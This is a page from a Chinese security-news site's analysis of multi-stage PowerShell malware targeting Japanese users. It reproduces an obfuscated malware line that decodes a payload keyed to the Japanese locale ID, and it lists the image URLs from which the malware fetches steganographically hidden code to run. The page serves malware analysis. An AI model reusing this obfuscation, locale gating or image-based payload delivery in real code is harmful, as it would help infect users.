欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

全新的恶意攻击技术已出现:针对日本用户的复杂多阶段PowerShell恶意脚本分析

来源:本站整理 作者:佚名 时间:2019-03-30 TAG: 我要投稿

经过第三轮反混淆后提取的PowerShell脚本
代码可以从以下一个url中下载另一个图像,然后提取、解压并执行嵌入的PowerShell代码。
https://images2.imgbox.com/25/39/dMnX3Y3Q_o.png
https://i.imgur.com/vwN9O7y.png

包含PowerShell代码的脚本下载的图像(隐写技术)
嵌入代码为:

从图像中提取的代码

嵌入的PE二进制文件
请注意,如果你要使用python脚本进行反混淆,请确保对第37行进行注释。
在图22的2415行,得到如下内容:
$NiSs=$Ni."LC`Id"; $aCc=@(($niss %4),2,($niss %6),4,($niss %7),($niss %9),($niss %11),($niss %12),10,($niss %100),(($niss %50)+10),(($niss %50)-10),(($niss %800)+9));[byte[]]$MjT=$null;$sPKk=""+$NiSs;.("{0}{1}"-f 'E','du') ${glOBaL:`M`G`GG} ([system.text.encoding]::"As`cIi"."gEtBy`TES"($sPKk)) ([ref]$MjT) $aCc;${glOBaL:`M`G`GG}=([System.Text.Encoding]::"Ut`F8"."g`e`TsTrinG"($MjT))
$Ni在第15行末尾分配($Ni=Get-Culture),当前文化的语言ID分配给$ NiS($ Ni.LCId)。 ja-JP的语言ID是1041。为了使代码有效,我们将其替换为以下的值。
$NiSs=1041; $aCc=@(($niss %4),2,($niss %6),4,($niss %7),($niss %9),($niss %11),($niss %12),10,($niss %100),(($niss %50)+10),(($niss %50)-10),(($niss %800)+9));[byte[]]$MjT=$null;$sPKk=""+$NiSs;.("{0}{1}"-f 'E','du') ${glOBaL:`M`G`GG} ([system.text.encoding]::"As`cIi"."gEtBy`TES"($sPKk)) ([ref]$MjT) $aCc;${glOBaL:`M`G`GG}=([System.Text.Encoding]::"Ut`F8"."g`e`TsTrinG"($MjT))
现在,我们可以调试代码并提取嵌入的PE文件。
 

上一页  [1] [2] [3] 

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载